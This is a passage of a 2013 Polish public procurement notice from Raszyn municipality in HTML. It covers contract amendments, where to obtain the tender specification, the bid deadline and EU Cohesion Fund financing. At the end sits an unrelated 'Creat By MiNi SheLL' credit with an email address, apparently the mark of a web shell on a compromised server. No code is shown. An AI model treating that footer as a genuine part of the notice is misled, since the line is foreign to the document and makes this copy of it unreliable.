4)w zakresie zmiany osób wymienionych w § 15 oraz danych z § 16 niniejszej Umowy.
Zmiany postanowień zawartej umowy będą dokonywane za zgodą stron wyłącznie na podstawie pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.raszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 05-090 Raszyn, ul. Szkolna 2A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 10:30, miejsce: 05-090 Raszyn, ul. Szkolna 2A
Biuro Obsługi Mieszkąńców - parter pokój 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Powyższe zadania finansowane są ze środków unijnych w ramach Funduszu Spójności: Programu Operacyjnego Infrastruktura i Środowisko..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com